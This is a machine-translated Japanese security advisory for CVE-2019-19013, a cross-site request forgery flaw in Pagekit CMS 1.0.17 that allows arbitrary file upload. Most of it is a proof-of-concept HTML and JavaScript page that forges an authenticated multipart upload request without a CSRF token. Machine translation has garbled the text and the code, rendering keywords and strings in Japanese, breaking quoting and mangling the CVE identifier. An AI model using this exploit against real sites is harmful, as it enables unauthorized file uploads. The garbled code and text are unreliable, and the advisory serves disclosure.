発売日: 2019年11月21日の
更新: 2019年11月26日
影響を受けるシステム:
Pagekit Pagekit 1.0.17
説明:
CVE(CAN)ID:CVE-2019から19013
Pagekitは、モジュラー、軽量なコンテンツ管理システムです。
Pagekit 1.0.17バージョン、実装でCSRFの脆弱性があります。CSRFリクエストからタグを除去することにより、攻撃者は任意のファイルをアップロードするには、この脆弱性を悪用することができます。
<*出典:ベンダー
*>
試験方法:
警告
以下の手順(方法)が唯一の安全研究と教育の目的のために、攻撃運ぶことができます。ユーザー自身のリスク!
ベンダー()提供了如下测试方法:
<HTML>
<BODY>
<SCRIPT> history.pushState( ''、 ''、 '/')</ SCRIPT>
<SCRIPT>
関数submitRequest()
{
XHR =新しいXMLHttpRequestのVAR( );
xhr.open( "POST"、 "のhttp:\ / \ / localhostの\ / pagekit \ /システム\ /ファインダー\ /アップロード"、真の);
xhr.setRequestHeader( "Content-Typeの"、 "マルチパート\ /フォームデータ;境界= ---- WebKitFormBoundaryJze564AoGkbRRRUz");
xhr.setRequestHeader( "* \ / *"、 "受け入れ");
xhr.setRequestHeader( "EN-US、EN; Q = 0.9" "言語を受け入れます");
xhr.withCredentials =はtrue。
VAR本体= "
"コンテンツの廃棄:フォームデータ、名前= \"ファイル[] \ ";ファイル名= \" test.jpg \ "\ R \ n" +
"コンテンツタイプ:image / jpegの\ R \ n" +
「\ R \ n "+
"\ R \ n" +
"------ WebKitFormBoundaryJze564AoGkbRRRUz \ R \ n" +
"コンテンツの廃棄:フォームデータ、名前= \"パス\ "\ R \ n" +
" \ R \ n "+
"/ \ R \ n" +
"------ WebKitFormBoundaryJze564AoGkbRRRUz \ R \ n" +
"コンテンツの廃棄:フォームデータ、名前= \"ルート\ "\ R \ n" +
" \ R \ n」+
"ストレージ\ R \ n" +
"------ WebKitFormBoundaryJze564AoGkbRRRUz \ R \ n"は+
"コンテンツの廃棄:フォームデータ、名前= \" _ CSRF \ "\ R \ n" +
"\ R \ n" +
"\ R \ n" +
"------ WebKitFormBoundaryJze564AoGkbRRRUz - \ rを\ n"は、
VAR aBody =新しいUint8Array(body.length)。
ため(VAR iが= 0; I <aBody.length; I ++)
aBody [I] = body.charCodeAt(I)。
xhr.send(新たなBLOB([aBody]))。
}
submitRequest()。
</ SCRIPT>
<フォームアクション= "#">
の<input type = "ボタン"値= "要求を送信"のonclick = "submitRequest();" />
</ FORM>
</ BODY>
</ HTML>
建议:
メーカーパッチ:
Pagekit
-------
:現在、ベンダーがパッチやアップグレードを提供していない、我々はあなたが最新バージョン取得するために、ベンダのホーム・ページを懸念、いつでもこのソフトウェアを使用することをお勧めします
https://pagekit.com/
HTTPSを:// packetstormsecurity.com/files/155426/Pagekit-CMS-1.0.17-Cross-Site-Request-Forgery.html